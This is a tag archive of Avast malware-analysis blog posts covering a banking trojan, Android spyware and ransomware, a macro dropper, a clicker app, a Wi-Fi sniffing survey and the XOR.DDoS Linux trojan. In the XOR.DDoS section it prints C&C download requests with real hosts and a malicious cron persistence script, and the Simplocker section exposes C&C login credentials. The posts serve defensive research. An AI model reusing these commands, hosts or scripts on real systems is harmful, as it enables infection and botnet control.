Tag Archives: analyses

Tiny Banker hidden in modified WinObj tool from Sysinternals

The Tiny Banker Trojan is spread by email attachments.

Tiny Banker aka Tinba Trojan made a name for itself targeting banking customers worldwide. The Avast Virus Lab first analyzed the malware found in the Czech Republic reported in this blog post, Tinybanker Trojan targets banking customers. It didn’t take long for the malware to spread globally attacking customers from various banking behemoths such as Bank of America, Wells Fargo, and RBC Royal Bank, which we wrote about in Tiny Banker Trojan targets customers of major banks worldwide.

This time we will write about a campaign targeting customers of Polish financial institutions.  The Trojan is spread by email attachments pretending to be pictures. The examples of email headers are shown in the following image.

 email

In fact, there are executable files in the zip attachments – IMG-0084(JPEG).JPEG.exe, fotka 1.jpeg.exe. The interesting thing is that the binary looks almost like regular WinObj tool from Systernals, however there are differences: The original version of WinObj has a valid digital signature. The malware doesn’t have any.

The most significant difference is in the payload that replaced the original code. It is the same until a VA 0×414923  is reached where the original code is replaced by a malicious one, as you can see on the following image.

 Binary comparsion

There are some modifications in Tiny Banker including anti-debug tricks, however the encryption remains the same RC4 with a hard-coded password.

 

RC4 password

 

Using the RC4 algorithm with the hard-coded password we were able to get the configuration file for the Banker.

RC4 Passwordconfig

The configuration file provided us with information about the targeted financial institutions in Poland.

  • Bank Zachodni WBK
  • Bank Pekao
  • BOS Bank
  • BGZ GNP Paribas
  • eurobank
  • GBSBank
  • mBank
  • Toyota Bank
  • Spóldzielcza Grupa Bankowa

SHA256
C49EEF5967E6A4A76AEA1950FD298206371B12CD2E00D478270F44B49BB5F157
FA394A41F1BB686AF7D71E9983E1C3C3340FDE70E0D9752D9927DA809B93C920

Avast detections

Avast customers are protected by the following detections:
Win32:Kryptik-PMD [Trj]
Win32:Kryptik-PME [Trj]

Conclusion

Malware spreading by email scams is pretty common. Malware authors use Tiny Banker to target multiple customers of financial institutions around the world. They used a regular binary this time and replaced original code with their payload.

Acknowledgement
This analysis was done collaboratively by David Fiser and Jaromir Horejsi.


Follow Avast on FacebookTwitterYouTube, and Google+ where we keep you updated on cybersecurity news every day.

Android malware Fobus now targeting users in the U.S., Germany and Spain

Mid January we informed you of a data-stealing piece of Android malware called Fobus. Back then Fobus mainly targeted our users in Eastern Europe and Russia. Now, Fobus is also targeting our users in the USA, United Kingdom, Germany, Spain and other countries around the world.

Fobus can cost its unaware victims a lot of money, because it sends premium SMS, makes calls without the victims’ knowledge and can steal private information. More concerning is that Fobus also includes hidden features that can remove critical device protections. The app tricks users into granting it full control of the device and that is when this nasty piece of malware really begins to do its work. You can find some more technical details and analysis of Fobus in our previous blog post from January.

Today, we decided to look back and check on some of the data we gathered from Fobus during the last six months. We weren’t surprised to find out that this malware family is still active and spreading, infecting unaware visitors of unofficial Android app stores and malicious websites.

The interesting part of this malware is the use of server-side polymorphism, which we suspected was being used back in January but could not confirm. We have now confirmed that server-side polymorphism is being used by analyzing some of the samples in our database. Most of these have not only randomly-generated package names, but it also seems that they have randomly-generated signing certificates.

Number of users who have encountered Fobus

Number of users who have encountered Fobus

Geographical reach expanded from the East to the West

Previously, we predicted that we would probably see a steady growth in the number of encounters users have with this malicious application. A review of the results, however, beats all of our predictions. At the beginning, this malware mainly targeted mobile users in Russian speaking countries. As our detections got smarter and we discovered new mutations of Fobus, we discovered that many other countries are affected as well. Now Fobus, although it still mainly targets users in Eastern Europe and Russia, is also targeting our users in the USA, Germany, United Kingdom, Spain, and other countries around the world.

The above graph shows the number of unique users (user IDs) encountering Fobus per day. The graph is also geologically divided by country codes as reported by the users’ connection location.

Number of times users encountered Fobus by country (as of July 21, 2015):

  • Russia: 87,730
  • Germany: 25,030
  • Spain: 12,140
  • USA: 10,270
  • UK:  6,260
  • Italy: 5,910

There are two great leaps visible in the graph, which mark the days when new versions of Fobus were discovered and new detections protecting our users were released. These three detections seem to be particularly effective at their task. The high impact in countries outside of Russia and English speaking regions, which can be seen in the graph, is a little surprising. Especially considering that the malware typically is only in Russian and English and even the English version contains some strings in Russian. Seems like the authors were too lazy to translate their own app properly…

World map showing the percentage of users who encountered Fobus

World map showing the percentage of users who encountered Fobus

An app, built just for you

Now, let’s dig into the analysis. We will look at the certificates used to sign some of the Fobus samples. We already mentioned the problems connected with generating unique applications for each victim (server-side polymorphism). This does not only apply to rebuilding, repackaging and obfuscating each instance of the app itself, but also extends to their signing certificates. To back this up, we analyzed around 4,000 samples and data and inspected the usage of these certificates. We verified that each build of the malicious app is typically seen by one user only, even though its signing certificate can be used to sign multiple apps. Virtually all of the samples we have are very low prevalent, meaning that different users only very rarely see an app instance multiple times. As for the signing certificates, we believe that they are being regenerated on a timely basis. We were able to pick a few examples of such certificates from our statistics.

certs_may_28certs_may_30

 

 

 

 

 

 

 

 

 

 

As you can see from the screenshots above, these certificates are dated the 28th and 30th May 2015 and the time differences in the beginning of the validity period between these certificates are in the order of minutes, sometimes even seconds. We have also found some samples that have certificates with randomly generated credentials altogether.

certs_random

The above provided screenshot is an example of such randomly generated certificates.

To conclude, we would like to encourage you to think twice about the apps you install on your phone. Especially if the apps you download are from third party stores and unknown sources. If you download apps from the Google Play Store you’re on the safe side. Requiring nonstandard permissions – especially permissions that don’t seem necessary for the app to properly function – may be a sign that something fishy going on. You should be very suspicious of an app that requests device administrator access and think twice before downloading it.

Acknowledgement

Special thanks to my colleague, Ondřej David, for cooperation on this analysis.

Malware authors go a step further to access bank accounts

Malware authors like to play hide-and-seek. Hiding executable files inside PDFs and Microsoft Office documents then emailing them as attachments are nothing new, but sometimes one layer isn’t enough. This Avast Virus Lab analysis peels back the layers of a new threat.

layers-banking-malware

Malware authors continually surprise us with their creativity. In an effort to trick banking customers into revealing the login credentials for their online account, cycbercrooks are using the trust people have in Microsoft Office to make them execute banking malware on their own computers. Here’s how it works:

Typically, spam emails contain executable files that can harm a victim’s computer and steal private information. In the layered version, they have PDFs or Microsoft Office documents attached that contain a malicious executable file. We recently found an email that had an added layer and decided to analyze the email.

The email, disguised as a financially-related message from a legitimate company,  informed the recipient that an invoice was due and had a PDF file attached. Embedded inside the malicious PDF was a Microsoft Office document and simple java script that dropped and executed the DOC file.

pdf_jsInside the DOC file we found malicious macro code, which users must activate, as the code is disabled by Microsoft Office by default. The code obfuscates DOC files by creating new documents with unique methods names, variable names, and URLs, making it difficult to detect the malicious files.

 Macro_modules

When we analyzed the malicious macro code, we found some hints that helped us with our analysis. In this sample it was a function called MICHEL.

Functions

We already knew this function would open the URL with the malicious file, and when we found this function in one of the modules, we were able to find the download path.

Macro_downloader

The address is stored as a GUADALUPE variable. The URL is unique for each sample and leads to the download of a malicious PE file.

Macro_downloader_watch

The PE file would act as an information stealer, stealing login credentials from banking sites like

  • Santander, whose principal market is in the Northeastern United States
  • Ulster bank, based in Ireland
  • From Google accounts
  • Microsoft

How to protect yourself from banking malware

Our number 1 recommendation is keep your security software updated. Avast streams hundreds of updates every day to your devices, so you will stay protected. For example, the executable file downloaded by the malicious Microsoft Office document belongs to a banker family evolved from infamous Zeus. This variant is also known as a Dridex Botnet. At the time of writing this post, the botnet is still active, but the malware itself is inactive. Avast detects it as Win32: Pierre-A.

Clever cybercrooks use social engineering to manipulate their victims. Use extreme caution when opening emails related to your finances until you can verify the legitimacy.

Samples related to this analysis:

PDF virustotal

DOC virustotal

PE virustotal

Porn clicker app slipped into Google Play imitating popular Dubsmash app

Everyone from celebrities like Lena Dunham to Hugh Jackman are using the (currently) seventh most popular app available on Google Play: Dubsmash. Dubsmash is an app with more than 10 million Google Play installations that lets users choose a sound, record a video to go along with the sound and send their dub to their friends or social media channels. Dubsmash is not only widely popular amongst teens and celebs, but the app has also caught the attention of malware authors.

Avast finds porn clicker app named Dubsmash 2 on Google Play

Google removed the rouge app after Avast notified them

Avast recently discovered “Dubsmash 2” (with the package name “com.table.hockes”) on Google Play – and no, it was not the bigger and better version of the original app. The app is a so called “porn clicker” and was installed 100,000-500,000 times from the Google Play Store. We contacted Google when we discovered the rogue app and it was removed from the Play Store shortly thereafter. Once the app was installed there was no evidence of an app named “Dubsmash 2” on the user’s device, instead the app installed an app icon named “Setting IS”. This is a common trick malware authors use to make it harder for the user to figure out which app is causing problems. This should also be the user’s first clue that something shady is going on. The “Settings IS” icon looked very similar to the actual Android Settings icon (see screenshot below).

The app’s mischievous activities could be triggered by two actions. The first possible way was by simply launching the “Settings IS” app and the second, which occurred only if the user had not yet launched the app, was via the BroadcastReceiver component within the app. BroadcastReceiver observed the device’s Internet connectivity and  if the BroadcastReceiver noticed the device was connected to the Internet, the app’s true functions would be triggered.

If the “Settings IS” app was opened by the user, the Google Play Store would launch to the actual “Dubsmash” app download page.

Porn clicker "Settings IS"

The rogue icon looked very similar to the Android Settings icon

Once activated, the app sent an HTTP GET request to an encrypted URL. If the request returned a string containing the character “1”  two services would begin to work: MyService and Streaming. Using this method the author could also effectively turn off the start of the services remotely.

The MyService service began by deleting the “Settings IS” app icon from the device’s main menu and scheduled a task to run every 60 seconds in the background of the device, meaning the user never realized that anything was happening. The task would download a list of links to various porn sites from an encrypted URL stored within the app, along with JavaScript execution code. One of the porn links from the list would be launched in the browser and after ten seconds, the JavaScript code (also downloaded from an encrypted URL) was executed, clicking further links within the porn site. In the case seen in the picture below, the function opened a random link from the web page.

Porn links app opened

The developer probably made money on pay-per-click ads.

The second service, the Streaming service, was fairly similar in structure to the MyService component in that it also scheduled a task to run every 60 seconds. The main difference to MyService, is that users could notice the Service tasks did not run secretly in the background. The task would check for changes in the device’s IP address or date. If either of them had changed, a video would launch in the device’s YouTube app. The YouTube app needed to be installed on the device for this to function properly. The video address was also obtained from an encrypted URL.

code_screen_1

The encrypted URLs used by the app

After decrypting and further examining the URLs and the video from YouTube, the Avast Virus Lab came to the conclusion that the malware most likely originated from Turkey. The developer’s name listed on Google Play and YouTube hint to this.

We suspect the app developer used the porn clicker method for financial gain. Through clicks on multiple ads within the porn sites, the app developer probably received pay-per-click earnings from advertisers who thought he was displaying their ads on websites for people to actually see.

Despite being undesirable, but basically harmless to the user and less sophisticated than other malware families such as Fobus or Simplocker, this app shows that although there are safeguards in place, undesirable apps that fool users can still slip into the Google Play store.

If you installed Dubsmash 2 (package name “com.table.hockes”), you can delete the app by going into Settings -> Apps -> find “Settings IS” and then uninstall the app.

The Avast Mobile Security application detects this threat as Android:Clicker. SHA-256 hash: de98363968182c27879aa6bdd9a499e30c6beffcc10371c90af2edc32350fac4

Thank you Nikolaos Chrysaidos for your help with the analysis :)

Behind the Scenes of Avast’s Global Wi-Fi Hack Experiment: How we collected and analyzed Wi-Fi data

Wi-Fi and encryption

 

Data transmitted over a wireless network can be either unencrypted or encrypted. While both options are available to users, the use of open, unprotected Wi-Fi networks has become increasingly popular across the globe. In the case of open wireless networks, the transmitted data are unencrypted and might be visible to others, as is shown in the screenshot below. To resolve this issue, many wireless networks use password protection. However, the method and strength of these passwords matter: if a weak encryption method, such as WEP, is used, an attacker can simply crack the password and decrypt the device’s communication. Hence, the use of a strong encryption such as WPA/WPA2 is suggested. The length of a password is another important factor to its strength — a strongly encrypted communication with a short key length can still be cracked by hackers within a short amount of time. Because of this, a key length of longer than 8 characters is strongly recommended.

network

(Figure 1: List of available wireless networks featuring both encrypted and unencrypted options.)

 

Introduction

 

In February, we sent several volunteers to 9 cities: Chicago, New York, San Francisco, Berlin, Barcelona, London, Taipei, Hong Kong and Seoul. Our goal was to gather as much information about the use of wireless networks in these cities as possible.

 

Each volunteer was equipped with a laptop and a WiFi adapter with ability to be switched into monitor mode. This feature allowed us to listen to all wireless communication — even that which wasn’t targeted to our device. This way, we could listen to the data transmitted between the access point and devices receiving it.

DSC01223_

(Figure 2: Laptop and Wi-Fi adapter hidden in the bag. )

 

Each volunteer walked around a city with an adapter tucked away in his or her bag that constantly listened in on nearby wireless communication.

 

For this experiment, we developed our own application called Trafi Canal, which was based on the free tool Microsoft Network Monitor. This application logged interesting wireless communication data and stored it for later statistical analysis.

tc

(Figure 3: Avast’s traffic analyzing application, Trafi Canal)

 

This application monitored the wireless traffic at 2.4 GHz frequency and logged the identifiers of hotspots, identifier addresses of devices connected to the hotspots, sources and targets of the communication, and GPS coordinates.

Destinations

 

The German capital was one of the destinations in our experiment that yielded impressive results. Our volunteer spent one full day walking around the city collecting data.

DSC01220_

(Figure 4: Monitoring in front of German Bundestag, Berlin. The Wi-Fi adapter can be seen on the left of the laptop.)

 

Throughout the day, the Trafi Canal app collected GPS coordinates of our volunteer’s movements. The map below shows the extensive route he took around Berlin’s city center.

ber

(Figure 5: Walking coordinates in Berlin)

 

Throughout the day, our volunteer encountered more than 8,500 hotspots and came into contact with more than 23,000 devices. If you think our data collected in Berlin is large, imagine the total number of hotspots and devices we encountered throughout all of the 9 metropolitan areas that we visited!

 

Statistics

 

After collecting the data in each of the cities, we wrote a script to automatically analyze and process the acquired data. We focused on the most popular channels that hotspots use: encryption types, mostly typical SSIDs, and analysis of communication.

 

Berlin:

 

Although there are 14 channels in 2.4 GHz, not all of them are commonly used for communication. To avoid interferences in Wi-Fi networks, channels 1, 6 or 11 are recommended; however, not everyone follows that recommendation. To give you a better idea of the channels’ usage, here’s how it looks with Wi-Fi channels in the center of Berlin:

Channel 1 16%
Channel 2 9%
Channel 6 11%
Channel 11 13%
Channel 13 8%

 

In addition to hotspots’ channel usage, it’s also interesting to note that while slightly less than one half of hotspots (48%) are encrypted with strong WPA encryption, 3% use weak WEP encryption, and the remaining 26% have no encryption at all. In Berlin, we encountered a total of 8,731 hotspots, 42% of which had devices connected to them. We observed 5% of users communicating — 11% used unencrypted HTTP communication and another 21% encrypted HTTPS communication.

 

Each hotspot has a unique identifier (BSSID) and a name (SSID). As you might already know, Wi-Fi hotspot names are not unique and are often repeated (e.g. “Free Wi-Fi”). However, not all hotspots broadcast their names (SSID). In Berlin, in 11% of hotspots’ SSIDs are not broadcasted whatsoever.

 

Most typical hotspot names we encountered.

KD WLAN Hotspot+ 2.40%
HolidayInnExpress 1.48%
Telekom 1.07%
eduroam 0.72%
dlink 0.71%
FRITZ!Box 6360 Cable 0.70%
FRITZ!Box 7362 SL 0.65%
HU-VPN 0.62%
HU-VoIP 0.61%
HotelNET 0.58%

 

The 5 most visited domains in Berlin are Google, Amazon, Facebook, Akamai and Yahoo:

.1e100.net (Google) 45%
.amazonaws.com 13%
.facebook.com 13%
.akamaitechnologies.com 9%
.yahoo.com 7%

 

The most popular device manufacturers of connected users were:

Apple 31%
Intel Corporate 8%
TP-LINK TECHNOLOGIES CO.,LTD. 5%
Samsung Electronics Co.,Ltd 5%
LG Electronics 3%
Sony Mobile Communications AB 3%

 

Additional results

 

The process of collecting data was similar in all the cities we visited. For the brevity of this report, we will summarize the rest of our findings in the following table:


precentonly

Summary

  • While users in Asia were most likely to join open networks, Europeans and Americans were slightly less so.
  • A significant portion of mobile users browse primarily on unsecured HTTP sites.
  • Nearly one half of the Web traffic in Asia takes place on unprotected HTTP sites, compared with one third in the U.S. and roughly one quarter in Europe.
  • San Francisco and Berlin had the lowest percentage of weakly encrypted hotspots, compared to more than half of hotspots in London and New York and nearly three quarters in Asia.

 

Conclusion

 

The data transferred via unencrypted HTTP traffic are transmitted in plain text and may be visible to potential hackers. If a user uses SSL, we cannot read the data which are being transmitted, but we can still determine the domain the user is accessing. For example, we could see that that a user is visiting an email provider, but we cannot decrypt the actual data he or she transmits on the provider.

 

If user uses a VPN, an attacker is only capable of viewing the encrypted traffic from his or her computer to the VPN server The attacker doesn’t know which websites the user visits nor the content he or she transmits. Due to the fact that the installation and configuration of a virtual private network can be difficult for the average user, Avast offers an easy-to-use VPN solution called Avast SecureLine VPN.

 

Acknowledgements

 

The Wi-Fi hack experiment was conducted by the following people:

 Antonín Hýža, Jaromír Hořejší, Jerry Khan, Chun Lin Tu, Alex Grimaldo

 

Mobile Crypto-Ransomware Simplocker now on Steroids

In June 2014, we told you about mobile ransomware called Simplocker that actually encrypted files (before Simplocker, mobile ransomware only claimed to encrypt files to scare users into paying). Simplocker infected more than 20,000 unique users, locking Android devices and encrypting files located in the external storage. Then, it asked victims to pay a ransom in order to “free” the hijacked device. It was easy to decrypt the files affected by this variant of Simplocker, because the decryption key was hardcoded inside the malware and was not unique for each affected device.

Dangerous unique keys

keyBut now there is a new, more sophisticated variant of Simplocker in town that has already infected more than 5,000 unique users within days of being discovered. The reason why this variant is more dangerous than its predecessor is that it generates unique keys for each infected device, making it harder to decrypt infected devices.

To use an analogy, the original variant of Simplocker used a “master key” to lock devices, which made it possible for us to provide a “copy of the master key” (in the form of an app, Avast Ransomware Removal) to unlock already infected devices. The new variant however, locks each device with a “different key” which makes it impossible to provide a solution that can unlock each infected device, because that would require us to “make copies” of all the different “keys”.

Why would anybody install Simplocker?!

The reason why people install this new variant of Simplocker is because it goes undercover, meaning people don’t even realize that what they are installing is ransomware!

Fake Flash

Tricky Simplocker pretends to be a real app.

 

In this case, the new variant of Simplocker uses the alias “Flash Player” and hides in malicious ads that are hosted on shady sites. These ads mostly “alert” users that they need Flash Player installed in order to watch videos. When the ad is clicked on, the malicious app gets downloaded, notifying the user to install the alleged Flash Player app. Android, by default, blocks apps from unofficial markets from being installed, which is why users are notified that the install is being blocked for security reasons.
Device Admin Request

 

Users should listen to Android’s advice. However, users can go into their settings to deactivate the block and download apps from unknown sources. Once installed, a “Flash Player” app icon appears on the device and when it is opened the “Flash Player” requests the user grant it administrator rights, which is when the trouble really begins.

As soon as the app is granted administrator rights, the malware uses social engineering to deceive the user into paying ransom to unlock the device and decrypt the files it encrypted. The app claims to be the FBI, warning the user that they have found suspicious files, violating copyright laws demanding the user pay a $200 fine to decrypt their files.

device-2015-02-05-143216  FBI warning is an example of social engineering

What should I do if I have been infected?

We do NOT recommend you pay the ransom. Giving into these tactics makes malware authors believe they are succeeding and encourages them to continue.

If you have been infected by this new strain of Simplocker, back up the encrypted files by connecting your smartphone to your computer. This will not harm your computer, but you may have to wait until a solution to decrypt these files has been found. Then boot your phone into safe mode, go into the administrator settings and remove the malicious app and uninstall the app from the application manager.

Avast protects users against Simplocker

Avast Mobile Security protects users against both the old and new variant of Simplocker, the new variant is detected as: Android:Simplocker-AA.

A more technical look under the hood:

As the fake FBI warning is being shown to users, the malware continues working in the background, doing the following:

    • The malware decrypts the internal configuration in order to get information like C&C (command and control) commands, the extensions to encrypt, and which users should communicate through Jabber to get the private configuration.
2015-02-05_17-26-17

Internal Config

  • The malware communicates to the server every 60 minutes. Upon the first communication with the server it sends data like: BUILD_ID, AFFILIATE_ID, IMEI, OS, OperatorName, PhoneNumber, and Country to identify the device. Furthermore it checks whether the files have been encrypted or not. Also if a voucher has been entered, it sends back the type and the code. All the data that gets sent back to the server is formatted as: Base64 ( CRC(data) + MalwareEncryption(data) )
  • The data that is received by the server (private config) is saved into file <name>.properties in the root external storage folder of the device.

Command and Control (C&C)

The malware communicates with the C&C server through the XMPP protocol and Jabber.

graphserver

Communication with the C&C

The malware opens the connection in one of the JIDs (Jabber IDs) that can be found in the internal config (ex. [email protected]:LarXrEc6WK2 ).
2015-02-05_13-20-34

The connection is established  to the domain server (xmpp.jp)., then uses the username (timoftei) and the password (LarXrEc6WK2) to authorize itself. After authorization it tries to get the buddy list (roster) of the user. Each of the buddies are compared with the internal list, from internal config, in order to find the “master JID”, possibly the one user that will send back the data (private config) to the malware. After this process, the data is parsed and saved into the file <name>.properties  in the root external storage folder of the device.

After the retrieval of the private config the malware starts encrypting files.

SHA-256 Hash List:

  • 4A0677D94DD4683AC45D64C278B6E77424579433398CA9005C50A43FBBD6C8C2
  • 8E9561215E1ACE91F93B4FAD30DA6F368A9E743D3BE59EA34061ECA8EBAB1F33
  • 93FE7B9212E669BCF443F82303B41444CFE53ACEF8AC3A9F276C0FD2F7E6F123

Fobus, the sneaky little thief that could

One small Android application shows lots of determination and persistence. Too bad it’s evil.

Mobile malware, Fobus, acts like this famous little engine. "I think I can, I think I can!"

Mobile malware, Fobus, acts like this famous little engine. “I think I can, I think I can!”

 

The year 2014 was significant with a huge rise in mobile malware. One of the families impacting our users was malware Fobus, also known as Podec. This malware poses as a more or less useful application, but for sure it won’t be what the user expects. This malware usually has two language versions, English and Russian, and applications seem to be generated automatically.

All that, and a bag of chips

From the permissions in the manifest, we can see that once Fobus is installed on the victim’s device it cannot only send SMS and call premium numbers, which may cost a lot of money, but it also works as  Spyware and can steal personal data from the infected device. That’s a lot of bad stuff packed into one small application.

Permission

Next up is a bit more technical stuff. If you are really eager, skip to Me thinks that something is amiss section to see how it works.

Inspecting the manifest file provides the clues of the automatic modification of the application files. As you can see in the following picture, service names are randomly generated. Going through samples in our database we were able to identify some similarities, which helped us categorize this malware as the Fobus family.

Service

The manifest also includes several receivers which are indicators that the malware is able to spy on the device.  It can also protect itself against uninstallation.

This receiver provides persistence of Fobus.

Boot

These receivers are able to check the outgoing calls and received SMS.

Call SMS
The receiver pictured here helps to protect the malware against removal.

Admin

Me thinks that something is amiss

During installation, the Fobus permissions already show that something might not be in order. But, we all know, that most people fly through this step without much thought.

device-2015-01-13-094436 device-2015-01-13-094428 device-2015-01-13-094352

The Great Pretender

Fobus pretends to be an Ad Block but permissions to make phone calls, send messages, system tools, and services that cost money should not really be needed for an Ad Block application,  nor for most legitimate applications. That is,  unless you hope it will block unsolicited calls and marketing SMSs. Our advice: The user should always take great care when an application requires these types of permissions and try to link them to the expected app functionality. Inadequate permission requirements are often the first indicator of something fishy.

When the user accepts all these permissions nevertheless, Fobus installs as any other application would.

device-2015-01-13-094455 device-2015-01-13-094521

Here comes trouble!

The real trouble, however, begins when the user runs this application and grants Fobus device administrator privileges.

device-2015-01-13-094553 device-2015-01-13-094603

Once the user activates the device administrator, the application icon disappears from the device.

device-2015-01-13-094628

But in fact, Fobus is still in the device and starts doing what it was build for – SPYING on the device! The user is not able to Stop or Uninstall this application by standard means. Why? Because they gave permission for the app to do all these things in the previously accepted device administrator policy!

device-2015-01-13-094658 device-2015-01-13-094704

Well, just deactivate the device administrator and uninstall this application… That shouldn’t be so hard, right? But it is! The application is easily visible in the device administrator along with the deactivation button. So what is the problem?

device-2015-01-13-094721

Blink and you’ll miss it…

The sneaky Fobus has a receiver which checks for calls on device_admin_disable_request. The moment the user tries to deactivate the device administrator, this receiver catches the request and forces the device to lock the screen with a call to the Lock Now function. This function prevents the user from confirming the deactivation.

Afterwards, the application attempts to relock the screen with any unlock attempt. The confirmation box is visible for just a moment before the application forces the lock screen, however the user will never be able to confirm it in time because the device is not able to capture the user click on screen. The screen locking usually lasts for a while until the confirmation box simply disappears. Sometimes users are required to push one of the hardware buttons on their device to activate the screen. When they finally manage to unlock the device the application is still there and happily running. By now, the person who installed this sneaky little thief, is not a happy camper.

device-2015-01-13-094726

Empty threats

Should the user have lightening-fast reflexes and be able to get past the locking screen mechanism, the authors have another trick up their sleeves. This time, they try to scare the users from disabling the device administrator privilege by threatening to perform a full factory reset.

device-2015-01-13-121013

Fobus shows the user a fake warning about a full factory reset during which the user will lose all data stored on their device. “Heavens, NO!”, most users will say, as they choose the cancel button. But when user is brave and pushes the OK button,  the device administrator privilege will be successfully removed and theuser will also able to uninstall the malicious application from the mobile device.

This is a pretty strong uninstall prevention, isn’t it?

It can be very difficult to circumvent this type of protection, especially, since the application cannot be uninstalled by any other means, like ADB or the safe-mode. In ADB, the uninstalling operation finishes as failure and even though the safe-mode disables user-installed applications, in this case the malicious application is still protected by the device administrator privileges and therefore cannot be uninstalled.

How to remove this persistent malware

Affected victims can use third party software to remove this malicious application from their mobile device or actually perform the suggested factory reset.

The removal itself is a two-phase process.

First, you need to deactivate the device administrator privilege.

device-2015-01-13-120918 device-2015-01-13-120944 device-2015-01-13-121024

Then,  uninstall Fobus itself.

device-2015-01-13-121316 device-2015-01-13-121326

The little malware that could…

What makes the Fobus so special is not that it can spy on victims devices, send SMSs,  or call on premium numbers; there are loads of malicious apps that can do that. Just like The Little Engine That Could, Fobus never gives up.  Usually users are able to remove bad apps from their devices easily by themselves by simply uninstalling them. Fobus, though, doesn’t give up so easily, it’s strong removal protection can frustrate even the most experienced users.

Acknowledgement

Thanks to my colleague, Ondřej David, for cooperation on this analysis.

The Litttle Engine That Could image is from Hero Wikia.

Source

Here is a sample connected with the analysis

 

011a379b3f81dbfb4f6fb4f5c80b5ba4cf9f0677f0ee30c3a8d41711ade2d226

Linux DDoS Trojan hiding itself with an embedded rootkit

10867127_1516649011939387_257681840_nAt the end of September 2014, a new threat for the Linux operating system dubbed XOR.DDoS forming a botnet for distributed denial-of-service attacks was reported by the MalwareMustDie! group. The post mentioned the initial intrusion of SSH connection, static properties of related Linux executable and encryption methods used. Later, we realized that the installation process is customized to a victim’s Linux environment for the sake of running an additional rootkit component. In this blog post, we will describe the installation steps, the rootkit itself, and the communication protocol for getting attack commands.

Installation Script & Infection Vector

The infection starts by an attempt to brute force SSH login credentials of the root user. If successful, attackers gain access to the compromised machine, then install the Trojan usually via a shell script. The script contains procedures like main, check, compiler, uncompress, setup, generate, upload, checkbuild, etc. and variables like __host_32__, __host_64__, __kernel__, __remote__, etc. The main procedure decrypts and selects the C&C server based on the architecture of the system.

In the requests below, iid parameter is the MD5 hash of the name of the kernel version. The script first lists all the modules running on the current system by the command lsmod. Then it takes the last one and extracts its name and the parameter vermagic. In one of our cases, the testing environment runs under “3.8.0-19-generic SMP mod_unload modversions 686 “, which has the MD5 hash equal to CE74BF62ACFE944B2167248DD0674977. 

Three GET requests are issued to C&C. The first one is performed by the check procedure (note the original misspelling):

request:
GET /check?iid=CE74BF62ACFE944B2167248DD0674977&kernel=3.8.0reply:
1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists!

Then compiler procedure issues another GET request in which parameters like C&C servers, version info, etc, are passed to the server where they are compiled into a newly created executable:

request:
GET /compiler?iid=CE74BF62ACFE944B2167248DD0674977&username=admin
&password=admin&ip=103.25.9.245:8005%7C103.240.141.50:8005%7C
66.102.253.30:8005%7Cndns.dsaj2a1.org:8005%7Cndns.dsaj2a.org:8005%7C
ndns.hcxiaoao.com:8005%7Cndns.dsaj2a.com:8005
&ver=3.8.0-19-generic%5C%20SMP%5C%20mod_unload%5C%20modversions%5C%20686%5C%20
&kernel=3.8.0
reply:
1001|CE74BF62ACFE944B2167248DD0674977|header directory is exists!

Finally, the third GET request downloads the customized version of the Trojan’s binary in the form of a gzip archive, which is unpacked and executed:

request:
GET /upload/module/CE74BF62ACFE944B2167248DD0674977/build.tgz
reply:
1001|CE74BF62ACFE944B2167248DD0674977|create ok

The previous steps run only in the case that there already  is a built version for the current kernel version on the server side. If not, the script locates the kernel headers in /lib/modules/%s/build/ directory, where %s means the return value after calling the command uname with parameter r,  then packs all files and uploads them to the C&C server using a custom uploader called mini. The steps of the first scenario follows.

The rootkit component is a loadable kernel module (LKM). To install it successfully on a system, the vermagic value of LKM needs to agree with the version of the kernel headers installed on the user’s system. That’s the motivation behind previous installation steps. If previous sequences fail, the script installs a Trojan omitting the rootkit component.

Structure & Persistence

The binary structure of the main executable is as follows:

elf_xorddos_scheme

The persistence of the Trojan is achieved in multiple ways. First, it is installed into the /boot/ directory with a random 10-character string. Then a script with the identical name as the Trojan is created in the /etc/init.d directory. It is together with five symbolic links pointing to the script created in /etc/rc%u.d/S90%s, where %u runs from 1 to 5 and %s is substitute with the random. Moreover, a script /etc/cron.hourly/cron.sh is added with the content:

#!/bin/sh
PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/X11R6/bin’
for i in `cat /proc/net/dev|grep :|awk -F: {‘,27h,’print $1′,27h,’}`; do ifconfig $i up& done
cp /lib/udev/udev /lib/udev/debug
/lib/udev/debug

The line “*/3 * * * * root /etc/cron.hourly/cron.sh” is inserted in the crontab.

The functionality of the main executable lies in three infinite loops responsible for 1. downloading and executing instructions in a bot’s configuration file, 2. reinstalling itself as the /lib/udev/udev file,  and 3. performing flooding commands. The configuration file contains four categories of lists: md5, denyip, filename and rmfile and mean killing a running process based on its CRC checksum, on the active communication with an IP from the list, on a filename, and finally removing a file with a specified name. In the next figure, a fragment of the config file is displayed (known filenames connected with competing flooding Trojans are highlighted):

elf_config

The lists of processes to kill or remove before its own installation is typical for flooding Trojans.

Also we have to note that there is a variant of this Trojan compiled for the ARM architecture. This suggests that the list of potentially infected systems (besides 32-bit and 64-bit Linux web servers and desktops) is extended for routers, Internet of Things devices, NAS storages or 32-bit ARM servers (however, it has not been observed in the wild yet). It contains an additional implementation of the download-and-execute feature in an infinite loop called daemondown:

elf_decconf_arm

A few days ago, a new 32-bit variant of this Trojan with few modifications was observed. The bot is installed as /lib/libgcc4.so file, the unique file containing its identification string (see later) was /var/run/udev.pid, the initialization script was /etc/cron.hourly/udev.sh and the rootkit features were completely omitted. The presence of all these files could serve as an indicator of compromise (IoC).

LKM Rootkit

Trojans for the Windows platform have used various rootkit features for a very long time. It is known that some trojanized flooding tools had the Windows variant utilizing the Agony rootkit (its source code has been publicly shared and available since 2006).  We presented research related to these malicious DDoS tools at Botconf 2014 in a survey called Chinese Chicken: Multiplatform-DDoS-Botnets. Now there is a flooding Trojan for Linux that also contains an embedded rootkit. It’s main functionality is to hide various aspects of the Trojan’s activity and is provided by procedures in the switch table:

elf_rootkit_jumptable

The Trojan running in the userspace requests these features from the rootkit in the kernel by ioctl command with a specific code (0×9748712). The presence of the rootkit is first checked by opening a process with the name rs_dev:

elf_rootkit_ioctl

The own request needs two parameters: One specifies the number of the command to be performed by the rootkit, and the other one is the number of the port to be hidden. Below is an example of how the Trojan hides the TCP port (notice the task value 3):

elf_rootkit_hideport

